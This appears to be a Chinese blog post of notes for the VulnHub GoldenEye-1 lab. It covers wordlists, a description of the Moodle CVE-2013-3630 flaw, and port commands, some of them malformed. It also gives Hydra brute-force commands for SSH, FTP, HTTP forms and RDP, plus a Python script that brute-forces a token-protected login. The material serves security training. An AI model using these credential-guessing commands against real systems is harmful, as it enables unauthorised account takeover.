VulnHub-GoldenEye-1

VulnHub-GoldenEye-1 详细阶梯步骤
知识点总结
- 一、kali自带字典目录
- 二、vim文本编辑器
- 三、linux通过修改/etc/hosts文件添加IP地址与域名的映射
- 四、Moodle(CVE-2013-3630)
- 五、在linux下如何本地开启端口
常用工具篇
- 一、POP3：电子邮件协议
- 二、Hydra：暴力破解工具
- - 简介
  - 常见参数
  - - 破解SSH
    - 破解FTP
    - 破解HTTP
    - 破解3389远程登录
- 三、Netcat：网络测试工具
- 四、burpsuite-Decoder：编码解码工具
- 五、SearchSploit漏洞查找工具
- 六、查看jpg文件底层内容工具

VulnHub-GoldenEye-1 详细阶梯步骤

知识点总结

一、kali自带字典目录

路径：/usr/share/wordlists
简介
- dirb
  big.txt #大的字典
  small.txt #小的字典
  catala.txt #项目配置字典
  common.txt #公共字典
  euskera.txt #数据目录字典
  extensions_common.txt #常用文件扩展名字典
  indexes.txt #首页字典
  mutations_common.txt #备份扩展名
  spanish.txt #方法名或库目录
  others #扩展目录，默认用户名等
  stress #压力测试
  vulns #漏洞测试
- dirbuster
  apache-user-enum-** #apache用户枚举
  directories.jbrofuzz #目录枚举
  directory-list-1.0.txt #目录列表大，中，小 big，medium，small
- fern-wifi
  common.txt #公共wifi账户密码
- metasploit
  … #各种类型的字典
- webslayer
  general #普通字典目录
  admin-panels.txt #后台路径字典
  ….
  
  Injections #注入字典目录
  All_attack.txt #全部攻击
  bad_chars.txt #字符注入
  SQL.txt #sql注入
  Traversal.txt #路径回溯
  XML.txt #xml注入
  XSS.txt #xxs注入
  
  others #扩展目录
  common_pass.txt #通用密码字典
  names.txt #用户名字典
  
  stress #压力测试目录
  
  vulns #漏洞测试目录
  apache、iis、cgis…
  
  webservicces #web服务目录
  ws-dirs.txt #路径测试
  ws-files.txt #文件测试
  
  wfuzz #模糊测试，各种字典…

二、vim文本编辑器

刚进入时为命令模式

i 切换到输入模式，以输入字符。
x 删除当前光标所在处的字符。
: 切换到底线命令模式，以在最底一行输入命令。

底线命令模式

q 退出程序
w 保存文件

三、linux通过修改/etc/hosts文件添加IP地址与域名的映射

vim /etc/hosts
按I插入，插入完成后按ESC退出插入，输入:wq！保存退出

四、Moodle(CVE-2013-3630)

远程命令执行漏洞

Moodle允许经过身份验证的用户通过web界面定义拼写检查设置。用户可以更新拼写检查机制以指向安装了二进制文件的系统。通过将拼写检查器的路径更新为任意命令，攻击者可以运行拼写检查请求时web应用程序上下文中的任意命令。

此模块还允许攻击者利用另一个权限提升漏洞。使用引用的XSS vuln，一个未经授权的身份验证用户可以窃取一个管理员sesskey并使用它将权限升级为管理员权限，从而允许模块弹出一个shell作为以前未经授权的身份验证用户。

该模块已针对Moodle版本2.5.2和2.2.3进行了测试。

五、在linux下如何本地开启端口

查看哪些端口被打开：netstat -anp
关闭端口号：iptables -A INPUT -p tcp --drop 端口号-j DROP，iptables -A OUTPUT -p tcp --d port
打开端口号：iptables -A INPUT -p tcp --d port 端口号 -j ACCEPT
查看是否打开22端口：netstat -an| grep 22
lsof 查看端口占用语法格式：lsof -i:端口号
在查到端口占用的进程后，如果你要杀掉对应的进程可以使用 kill 命令：kill -9 PID

常用工具篇

一、POP3：电子邮件协议

二、Hydra：暴力破解工具

简介

Hydra是一款非常强大的暴力破解工具，它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。

目前该工具支持以下协议的爆破：
AFP，Cisco AAA，Cisco身份验证，Cisco启用，CVS，Firebird，FTP，HTTP-FORM-GET，HTTP-FORM-POST，HTTP-GET，HTTP-HEAD，HTTP-PROXY，HTTPS-FORM- GET，HTTPS-FORM-POST，HTTPS-GET，HTTPS-HEAD，HTTP-Proxy，ICQ，IMAP，IRC，LDAP，MS-SQL，MYSQL，NCP，NNTP，Oracle Listener，Oracle SID，Oracle，PC-Anywhere， PCNFS，POP3，POSTGRES，RDP，Rexec，Rlogin，Rsh，SAP / R3，SIP，SMB，SMTP，SMTP枚举，SNMP，SOCKS5，SSH（v1和v2），Subversion，Teamspeak（TS2），Telnet，VMware-Auth ，VNC和XMPP。

对于 HTTP，POP3，IMAP和SMTP，支持几种登录机制，如普通和MD5摘要等。

常见参数

-R：继续从上一次进度接着破解
-S：大写，采用SSL链接
-s <PORT>：小写，可通过这个参数指定非默认端口
-l <LOGIN>：指定破解的用户，对特定用户破解
-L <FILE>：指定用户名字典
-p <PASS>：小写，指定密码破解，少用，一般是采用密码字典
-P <FILE>：大写，指定密码字典
-e <ns>：可选选项，n：空密码试探，s：使用指定用户和密码试探
-C <FILE>：使用冒号分割格式，例如“登录名:密码”来代替 -L/-P 参数
-M <FILE>：指定目标列表文件一行一条
-o <FILE>：指定结果输出文件
-f ：**在使用-M参数以后，找到第一对登录名或者密码的时候中止破解
-t <TASKS>：同时运行的线程数，默认为16
-w <TIME>：设置最大超时的时间，单位秒，默认是30s
-v / -V：显示详细过程
server：目标ip
service：指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT：可选项

破解SSH

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 10.96.10.252 ssh   #-L指定用户字典 -P 指定密码字典  -o把成功的输出到ssh.txt文件 -vV显示详细信息

破解FTP

hydra -L user.txt -P passwd.txt -o ftp.txt -t 5 -vV 10.96.10.208 ftp #-L指定用户名列表 -P指定密码字典 -o把爆破的输出到文件 -t指定线程 -vV 显示详细信息

破解HTTP

破解HTTP，需要分析数据包的提交格式

1.GET方式：

hydra -L user.txt -P passwd.txt -o http_get.txt -vV 10.96.10.208 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect:H=Cookie: PHPSESSID=nvvrgk2f84qhnh43cm28pt42n6; security=low" -t 3
#前面那些参数就不说了，主要说一下引号里面的数据 /vulnerabilities/brute/ 代表请求目录，用：分隔参数，^USER^和^PASS^代表是攻击载荷，F=后面是代表密码错误时的关键字符串 ，H后面是cookie信息

2.POST方式：

hydra -L user.txt -P passwd.txt -t 3 -o http_post.txt -vV 10.96.10.183 http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login&user_token=dd6bbcc4f4672afe99f15b1d2c249ea5:S=index.php"
#前面那些参数就不说了，主要说一下引号里面的数据 /login.php 代表请求目录，用：分隔参数，^USER^和^PASS^代表是攻击载荷，S等于的是密码正确时返回应用的关键字符串

3.token方式：

采用token的验证方式时，每次登录的token都是不一样的，所以不能用hydra来破解。

目前，大多数网站登录都采用了token验证，所以，都不能使用Hydra来破解。

我们可以自己写一个python脚本来破解。

# -*- coding: utf-8 -*-
"""
Created on Sat Nov 24 20:42:01 2018
@author: 小谢
"""
import urllib
import requests
from bs4 import BeautifulSoup##第一步，先访问 http://127.0.0.1/login.php页面，获得服务器返回的cookie和token
def get_cookie_token():headers={'Host':'127.0.0.1','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Connection':'keep-alive','Upgrade-Insecure-Requests':'1'}res=requests.get("http://127.0.0.1/login.php",headers=headers)cookies=res.cookiesa=[(';'.join(['='.join(item)for item in cookies.items()]))]   ## a为列表，存储cookie和tokenhtml=res.textsoup=BeautifulSoup(html,"html.parser")token=soup.form.contents[3]['value']a.append(token)return a
##第二步模拟登陆
def Login(a,username,password):    #a是包含了cookie和token的列表headers={'Host':'127.0.0.1','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Connection':'keep-alive','Content-Length':'88','Content-Type':'application/x-www-form-urlencoded','Upgrade-Insecure-Requests':'1','Cookie':a[0],'Referer':'http://127.0.0.1/login.php'}values={'username':username,'password':password,'Login':'Login','user_token':a[1]}data=urllib.parse.urlencode(values)resp=requests.post("http://127.0.0.1/login.php",data=data,headers=headers)return
#重定向到index.php
def main():with open("user.txt",'r') as f:users=f.readlines()for user in users:user=user.strip("\n")                 #用户名with open("passwd.txt",'r') as file:passwds=file.readlines()for passwd in passwds:passwd=passwd.strip("\n")   #密码a=get_cookie_token()              ##a列表中存储了服务器返回的cookie和tokeLogin(a,user,passwd)headers={'Host':'127.0.0.1','User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Connection':'keep-alive','Upgrade-Insecure-Requests':'1','Cookie':a[0],'Referer':'http://127.0.0.1/login.php'}response=requests.get("http://127.0.0.1/index.php",headers=headers)if response.headers['Content-Length']=='7524':    #如果登录成功print("用户名为：%s ,密码为：%s"%(user,passwd))   #打印出用户名和密码break
if __name__=='__main__':main()

破解3389远程登录

3389端口是Windows 2000(2003) Server远程桌面的服务端口，可以通过这个端口，用"远程桌面"等连接工具来连接到远程的服务器，如果连接上了，输入系统管理员的用户名和密码后，将变得可以像操作本机一样操作远程的电脑，因此远程服务器一般都将这个端口修改数值或者关闭。

hydra 202.207.236.4 rdp -L user.txt -P passwd.txt -V

三、Netcat：网络测试工具

Netcat 是一款简单的Unix工具，使用UDP和TCP协议。它是一个可靠的容易被其他程序所启用的后台操作工具，同时它也被用作网络的测试工具或黑客工具。使用它你可以轻易的建立任何连接。

四、burpsuite-Decoder：编码解码工具

Burp Decoder是Burp Suite中一款编码解码工具，将原始数据转换成各种编码和哈希表的简单工具，它能够智能地识别多种编码格式采用启发式技术。

通过有请求的任意模块的右键菜单send to Decoder或输入数据选择相应的数据格式即可进行解码编码操作，或直接点击Smart decoding进行智能解码。

对于同一个数据，我们可以在Decoder的界面，进行多次编码解码的转换。

五、SearchSploit漏洞查找工具

“searchsploit”是一个用于Exploit-DB的命令行搜索工具，它还允许你随身带一份Exploit-DB的副本。
SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接，这些文件不包含在标准存储库中，但可以在我们的Exploit-DB二进制文件中找到。

六、查看jpg文件底层内容工具

binwalk（路由逆向分析工具）
exiftool（图虫）
strings（识别动态库版本指令）：在对象文件或二进制文件中查找可打印的字符串

语法：strings [ -a ] [ - ] [ -o ] [ -t Format ] [ -n Number ] [ -Number ] [file ... ]

-a --all：扫描整个文件而不是只扫描目标文件初始化和装载段
-f –print-file-name：在显示字符串前先显示文件名
-n –bytes=[number]：找到并且输出所有NUL终止符序列
- ：设置显示的最少的字符数，默认是4个字符
-t --radix={o,d,x} ：输出字符的位置，基于八进制，十进制或者十六进制
-o ：类似--radix=o
-T --target= ：指定二进制文件格式
-e --encoding={s,S,b,l,B,L} ：选择字符大小和排列顺序:s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
@ ：读取中选项

【渗透测试】VulnHub-GoldenEye-1相关推荐

Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日靶机描述:欢迎使用" IMF&qu ...
看完这篇教你玩转渗透测试靶机vulnhub——DC9
Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...
看完这篇教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...
VulnHub渗透测试实战靶场 - Odin：1
VulnHub渗透测试实战靶场 - Odin:1 题目描述环境下载 NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权题目描述 Odin v ...
看完这篇教你玩转渗透测试靶机vulnhub——DC3
Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...
Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权环境下载戳此进行 ...
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘 getshell 提权 ...

【渗透测试】VulnHub-GoldenEye-1